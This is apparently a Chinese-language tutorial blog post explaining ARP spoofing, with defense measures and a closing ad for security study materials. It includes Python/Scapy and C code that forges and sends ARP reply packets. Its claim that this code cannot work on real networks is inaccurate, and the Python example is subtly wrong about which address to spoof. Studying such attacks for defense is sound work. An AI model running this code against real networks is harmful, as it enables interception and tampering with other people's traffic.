【网络攻击手段之-----ARP欺骗】

网络攻击手段之-----ARP欺骗

• 前言
• 什么是ARP欺骗
• APR欺骗的原理
• ARP欺骗的实现
• ARP欺骗后可以选择进一步攻击
• ARP欺骗的模拟实验

• * Python语言
  

  • C语言
• ARP欺骗的防御

前言

本篇文章介绍了什么是ARP欺骗，并使用了代码来模拟ARP的欺骗攻击，ARP 欺骗攻击是一种高危网络攻击，对网络安全造成严重威胁。因此，不应该对任何目标进行
ARP 欺骗攻击。做一个遵纪守法的公民，从我做起！！！

什么是ARP欺骗

ARP (Address Resolution Protocol) 是一种网络层协议，用于将 IP 地址转换为物理地址（MAC
地址）。在局域网中，每台设备都有唯一的 MAC 地址，而 IP 地址是可以重复分配的。因此，当一个设备需要发送数据到另一个设备时，它需要知道另一个设备的
MAC 地址。
ARP 欺骗（ARP spoofing）是一种网络攻击技术，通过发送伪造的 ARP
数据包，让目标设备误以为攻击者是其网关或其它设备，从而达到欺骗目标设备的目的。这样，攻击者就可以截获目标设备发出的数据包，甚至可以修改、篡改数据包中的内容。
ARP欺骗攻击能导致网络连通性问题，网络隐私泄露，中间人攻击，欺骗目标设备的目的。而且很难发现，所以网络安全问题需要时刻保持高度警惕。

APR欺骗的原理

ARP 欺骗的原理主要基于 ARP 协议的工作原理。

ARP 协议是通过广播请求来获取目标设备的 MAC 地址的。当一个设备需要发送数据到另一个设备时，它会发送一个 ARP
请求，询问局域网内的所有设备，是否有指定 IP 地址对应的 MAC 地址。目标设备收到该请求后，会回复一个 ARP 应答，告诉请求者它的 MAC 地址。

ARP 欺骗利用了这种工作原理，攻击者会发送伪造的 ARP 数据包，将自己伪装成网关或其它设备。目标设备收到伪造的 ARP 数据包后，会将攻击者的 MAC
地址映射到目标 IP
地址上，并将后续数据包发送给攻击者。攻击者就可以截获目标设备发出的数据包，甚至可以修改、篡改数据包中的内容。此时，攻击者已经拦截了目标设备和网关之间的数据包传输，并可能对数据包进行抓包，修改或篡改等攻击。

同时，攻击者可以再发送伪造的ARP请求，将其它设备的IP映射到自己的MAC地址上，这样攻击者就可以中间人攻击，抓包，篡改等等。

总之，ARP 欺骗攻击通过伪造 ARP 数据包来破坏网络的正常通信，达到攻击的目的。

ARP欺骗的实现

ARP (Address Resolution Protocol) 攻击是指攻击者伪造 ARP 数据包来欺骗网络中的其他设备。ARP 攻击的实现过程如下：

1、攻击者扫描网络中的 IP 地址和 MAC 地址。

2、攻击者构造伪造的 ARP 数据包，其中包含网络中其他设备的 IP 地址和攻击者自己的 MAC 地址。

3、攻击者发送伪造的 ARP 数据包到网络中。

4、被攻击的设备接收到伪造的 ARP 数据包，并更新其 ARP 缓存表。

5、之后，被攻击的设备将数据包发送到攻击者控制的设备上，而不是真正的目标设备，因此攻击者可以截获网络流量并篡改数据包。

ARP欺骗后可以选择进一步攻击

利用 ARP 欺骗进行的攻击可以进一步进行更深入的攻击，下面是一些例子：

中间人攻击 ：通过 ARP 欺骗攻击者可以成为网络中的中间人，收集网络流量并篡改数据包。

数据劫持 ：攻击者可以通过 ARP 欺骗来获取网络中的敏感信息，如用户名和密码。

欺骗DNS ：攻击者可以通过 ARP 欺骗来重定向 DNS 请求到攻击者控制的服务器上。

后门攻击 ：攻击者可以通过 ARP 欺骗来在网络中放置后门，进一步控制被攻击主机。

分布式拒绝服务攻击 (DDoS) ：攻击者可以通过控制多台设备进行 ARP 欺骗来发起 DDoS 攻击。

因此，防范ARP欺骗非常重要，需要采用多种手段来保护网络安全。

ARP欺骗的模拟实验

Python语言

下面是一个使用 Python 和 Scapy 库模拟 ARP 欺骗的示例代码：

from scapy.all import *

# 设置攻击者的 IP 地址和 MAC 地址
attacker_ip = "192.168.1.100"
attacker_mac = "00:11:22:33:44:55"

# 设置目标 IP 地址和 MAC 地址
victim_ip = "192.168.1.200"
victim_mac = "AA:BB:CC:DD:EE:FF"

# 构造伪造的 ARP 数据包
arp = ARP(op=2, psrc=attacker_ip, hwsrc=attacker_mac, pdst=victim_ip, hwdst=victim_mac)

# 发送伪造的 ARP 数据包
send(arp)

这段代码伪造了一个ARP数据包，其中包含了攻击者的 IP 地址和 MAC 地址，以及目标 IP 地址和 MAC 地址。在这个示例中, op = 2
表示这是一个ARP回应数据包，psrc是欺骗报文发起者的IP地址， hwsrc是欺骗报文发起者的MAC地址， pdst是欺骗报文接收者的IP地址，
hwdst是欺骗报文接收者的MAC地址。最后调用send函数发送该数据包。

但是需要注意的是，这只是模拟ARP欺骗的示例代码，并不能在真实的网络环境中使用。这样的代码可能会导致严重的网络问题，甚至可能违反法律法规。所以请勿在生产环境中使用。合格公民，从我做起！！！

C语言

1、使用libnet 库模拟 ARP 欺骗的示例代码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <libnet.h>

int main()
{
    libnet_t *handle;
    char errbuf[LIBNET_ERRBUF_SIZE];
    u_int32_t attacker_ip, victim_ip;
    u_int8_t attacker_mac[6], victim_mac[6];

    // 初始化 libnet
    handle = libnet_init(LIBNET_LINK_ADV, "eth0", errbuf);
    if (handle == NULL) {
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    // 设置攻击者的 IP 地址和 MAC 地址
    attacker_ip = libnet_name2addr4(handle, "192.168.1.100", LIBNET_DONT_RESOLVE);
    libnet_hex_aton("00:11:22:33:44:55", attacker_mac);

    // 设置目标 IP 地址和 MAC 地址
    victim_ip = libnet_name2addr4(handle, "192.168.1.200", LIBNET_DONT_RESOLVE);
    libnet_hex_aton("AA:BB:CC:DD:EE:FF", victim_mac);

    // 构造伪造的 ARP 数据包
    libnet_build_arp(
        ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REPLY,
        attacker_mac, (u_int8_t*)&attacker_ip, victim_mac, (u_int8_t*)&victim_ip,
        NULL, 0, handle, 0);

    // 发送伪造的 ARP 数据包
    libnet_write(handle);

    // 释放 libnet 资源
    libnet_destroy(handle);

	return 0;
}

这段代码使用了 libnet 库，首先初始化了 libnet 句柄并绑定了网卡。然后设置了攻击者的 IP 地址和 MAC 地址，目标 IP 地址和 MAC
地址。使用 libnet_build_arp函数构造了一个伪造的 ARP
数据包，其中包含了目标设备的IP地址，MAC地址，攻击者的IP地址，MAC地址，以及操作类型等信息。最后调用 libnet_write
发送该数据包，释放libnet资源。

这也是一个模拟ARP欺骗的示例代码，同样不能在生产环境中使用，需要注意遵守网络安全相关法律法规。

2、使用socket编程模拟ARP欺骗的示例代码：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/if_ether.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

int main()
{
    int sock;
    struct ifreq ifr;
    struct ether_header *eh;
    struct ether_arp *arp;
    struct sockaddr_ll sa;
    char *src_mac, *dst_mac, *src_ip, *dst_ip;
    char packet[sizeof(struct ether_header) + sizeof(struct ether_arp)];
    int packet_len = sizeof(packet);

    // 创建原始套接字
    if ((sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    // 获取网卡接口信息
    strcpy(ifr.ifr_name, "eth0");
    if (ioctl(sock, SIOCGIFHWADDR, &ifr) < 0) {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }
    src_mac = ifr.ifr_hwaddr.sa_data;

    if (ioctl(sock, SIOCGIFADDR, &ifr) < 0) {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }
    src_ip = inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr);

    // 设置目标 MAC 地址和 IP 地址
    dst_mac = "\xAA\xBB\xCC\xDD\xEE\xFF";
    dst_ip = "192.168.1.200";

    // 构造伪造的 ARP 数据包
    memset(packet, 0, packet_len);
    eh = (struct ether_header *) packet;
    arp = (struct ether_arp *) (packet + sizeof(struct ether_header));

    // Ethernet header
    memcpy(eh->ether_shost, src_mac, 6);
    memcpy(eh->ether_dhost, dst_mac, 6);
    eh->ether_type = htons(ETHERTYPE_ARP);

    // ARP packet
    arp->arp_hrd = htons(ARPHRD_ETHER);
    arp->arp_pro = htons(ETHERTYPE_IP);
	arp->arp_hln = 6;
	arp->arp_pln = 4;
	arp->arp_op = htons(ARPOP_REPLY);
	memcpy(arp->arp_sha, src_mac, 6);
	memcpy(arp->arp_tha, dst_mac, 6);
	inet_pton(AF_INET, src_ip, arp->arp_spa);
	inet_pton(AF_INET, dst_ip, arp->arp_tpa);
	// 填充 sockaddr_ll 结构体
	sa.sll_family = AF_PACKET;
	sa.sll_ifindex = ifr.ifr_ifindex;
	sa.sll_halen = ETH_ALEN;
	memcpy(sa.sll_addr, dst_mac, ETH_ALEN);

	// 发送伪造的 ARP 数据包
	if (sendto(sock, packet, packet_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
    	perror("sendto");
    	exit(EXIT_FAILURE);
	}

	// 关闭套接字
	close(sock);

	return 0;
	
}

这段代码使用了套接字编程来构造和发送ARP欺骗数据包，获取本机网卡信息，并设置目标设置的 MAC 地址和 IP 地址。构造出伪造的 ARP 数据包后，使用
sendto 函数将数据包发送出去。最后关闭套接字。

需要注意的是，这段代码仅供参考，在实际使用中需要根据自己的需求来修改，并且同样不能在生产环境中使用，需要遵守网络安全相关法律法规。

ARP欺骗的防御

防御 ARP 欺骗攻击的常用方法有以下几种：

1、使用防火墙或其它安全设备进行过滤，阻止伪造的 ARP 数据包通过。

2、使用 ARP 审计工具对网络中的 ARP 通信进行监测，及时发现异常情况。

3、使用 ARP 防窃听（ARP spoofing）软件来阻止攻击者发送伪造的 ARP 数据包。

4、定期清除 ARP 缓存表中的条目，避免攻击者利用 ARP 缓存攻击。

5、使用静态 ARP 映射的方式来配置网络设备，避免 ARP 欺骗攻击。

6、用动态主机配置协议DHCP Snooping 功能来限制DHCP服务器的IP地址，并验证DHCP请求来源的MAC地址是否在白名单中，从而防止攻击者伪造
DHCP 请求来获取 IP 地址。

7、使用端口隔离技术，限制不同网络之间的通信，防止攻击者欺骗内部网络中的设备。

8、使用VPN等技术来加密网络通信，防止攻击者截获数据包。

这些防御措施可以有效防范 ARP 欺骗攻击，但不能百分之百保证网络安全，所以在网络设计和管理中应该采用多层防御措施，并经常进行安全审计和检查，确保网络安全。

学习计划安排

我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦，无偿分享！！！

如果你对网络安全入门感兴趣，那么你需要的话可以

点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析